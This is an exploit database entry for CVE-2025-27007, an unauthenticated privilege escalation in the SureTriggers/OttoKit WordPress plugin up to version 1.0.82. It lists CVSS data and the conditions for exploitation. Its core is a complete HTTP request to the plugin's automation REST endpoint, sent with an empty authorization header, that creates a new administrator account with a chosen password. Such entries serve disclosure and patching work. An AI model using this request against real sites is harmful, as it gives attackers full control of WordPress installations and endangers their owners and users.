Exploit Details
Basic Information
| Exploit Title | SureTriggers OttoKit Plugin 1.0.82 – Privilege Escalation |
|---|---|
| Exploit ID | EDB-ID:52286 |
| Type | exploitdb |
| Published | 2025-05-09T00:00:00 |
| Modified | 2025-05-09T00:00:00 |
CVSS Information
| CVSS Score | 9.8 |
|---|---|
| Severity | CRITICAL |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
CVE Information
- CVE-2025-27007
Exploit Description
Exploit Code
# Date: 2025-05-7
# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)
# Affected: Versions All versions of OttoKit (SureTriggers) ≤ 1.0.82.
Conditions for Exploitation
The vulnerability can be exploited under the following circumstances:
1. OttoKit must be installed and activated on the target WordPress site.
2. The plugin *uninitialized* (e.g., no API key or “secret_key” is set
in the database).
3. The target site displays the REST API endpoint
‘/wp-json/sure-triggers/v1/automation/action’.
——————————
HTTP Request
The following request targets the
/wp-json/sure-triggers/v1/automation/action endpoint to create an
administrator account:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]
selected_options[user_name]=new_admin&selected_options[user_email]=
[email protected]&selected_options[password]=StrongP@ssw0rd123
&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists